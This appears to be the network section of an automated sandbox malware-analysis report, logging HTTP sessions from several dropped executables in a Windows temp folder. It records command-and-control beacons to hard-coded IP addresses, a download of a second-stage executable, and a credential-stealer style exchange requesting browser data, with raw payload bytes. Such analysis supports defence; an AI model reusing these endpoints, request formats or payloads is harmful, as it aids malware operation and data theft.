                                                                                                                                                                                                                                                              Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454195976 CET1236INData Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7
                                                                                                                                                                                                                                                              Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY|#l)\DItv
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454452038 CET1236INData Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c
                                                                                                                                                                                                                                                              Data Ascii: N^VW3DNF|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454488993 CET1236INData Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7
                                                                                                                                                                                                                                                              Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454524040 CET1236INData Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91
                                                                                                                                                                                                                                                              Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454560995 CET1236INData Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04
                                                                                                                                                                                                                                                              Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454931974 CET1236INData Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10
                                                                                                                                                                                                                                                              Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.454967022 CET1236INData Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0
                                                                                                                                                                                                                                                              Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.455003023 CET1236INData Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19
                                                                                                                                                                                                                                                              Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:57.573865891 CET1236INData Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9
                                                                                                                                                                                                                                                              Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              52192.168.2.450078212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:58.129453897 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:59.421688080 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:59 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              53192.168.2.450087212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:01.723011971 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:03.033238888 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:02 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              54192.168.2.450089185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:02.894839048 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019811001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:04.221860886 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:03 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              55192.168.2.450096185.215.113.16802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:04.544291019 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.847573996 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:04 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 2809344
                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 00:16:59 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67675a7b-2ade00"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 d9 47 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `+G+`Ui`D @ @ @.rsrcD``@.idata f@osxguznn`*P*h@nksckbfu +*@.taggant@ +"*@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.847624063 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.847662926 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.847886086 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.847924948 CET496INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.848032951 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.848063946 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.848099947 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.848134995 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.848172903 CET1236INData Raw: 59 c7 51 60 55 37 4f 95 8e ab df 97 31 9c df 27 57 bd b4 23 59 c7 51 b8 55 37 4f 95 18 37 df 97 31 9c df 27 57 bd b4 23 59 c7 51 a8 55 37 4f 95 94 ac df 97 31 9c df 27 57 bd b4 23 59 c7 51 fe 55 37 4f 95 94 ac df 97 31 9c df 27 57 bd b4 23 59 c7
                                                                                                                                                                                                                                                              Data Ascii: YQ`U7O1'W#YQU7O71'W#YQU7O1'W#YQU7O1'W#YQBX7O1'W2YQX7O1'W2YQY7O1'W2YQFW7O1'W2YQW7O1'WY7'Y'Y7'Y7'Y'Y'Y'Y'\<7-3Jm&Y7'Y'Y+Y)*
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:05.968091011 CET1236INData Raw: 59 37 df 27 59 b7 df f6 39 26 f9 53 5c b1 df 27 59 37 df a7 59 1c 00 af 58 7f e0 30 59 37 df 27 59 b7 df f6 39 d1 f8 66 5c a4 df 27 59 37 df a7 59 1c 00 03 56 ee e0 2b 59 37 df 27 59 b7 df f6 39 68 fc b8 5c a6 df 27 59 37 df a7 59 1c 00 02 56 e1
                                                                                                                                                                                                                                                              Data Ascii: Y7'Y9&S\'Y7YX0Y7'Y9f\'Y7YV+Y7'Y9h\'Y7YVtY7'Y9\97'YXY/'Y7Y\G<7'YCTY'Y7Y\<7'YUY'Y7Y\\<7'YuTY'Y7A0Y'97'Y7&Y&YS$Y&YjX7


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              56192.168.2.450097212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:04.939801931 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:06.199645996 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:05 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              57192.168.2.450107212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:08.427165985 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:09.705137968 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:09 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              58192.168.2.450121185.215.113.206807748C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:10.528225899 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:11.798858881 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:11 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:11.992114067 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 210
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 42 37 45 33 44 43 45 34 45 37 35 38 38 30 39 30 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"E36B7E3DCE4E758809014------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"stok------EBKKKEGIDBGHIDGDHDBF--
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:12.441946983 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:12 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Length: 180
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 4e 44 46 69 4e 47 56 6a 4f 57 45 78 59 7a 49 79 4e 32 4d 30 59 54 63 7a 4e 44 67 31 4f 57 4a 68 4f 44 55 79 5a 6a 63 77 5a 6a 42 69 4f 44 4e 6d 5a 6a 6c 69 4f 57 52 69 4e 54 41 33 4d 57 56 6b 4d 32 45 35 4d 6d 4a 69 4e 44 6c 69 4e 6a 55 77 59 7a 45 77 4d 57 4a 6c 4f 57 52 6a 59 54 45 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                              Data Ascii: NDFiNGVjOWExYzIyN2M0YTczNDg1OWJhODUyZjcwZjBiODNmZjliOWRiNTA3MWVkM2E5MmJiNDliNjUwYzEwMWJlOWRjYTEyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:12.528701067 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAF
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 268
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="message"browsers------ECBKKKFHCFIDHIECGCAF--
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:12.967668056 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:12 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Length: 2028
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=98
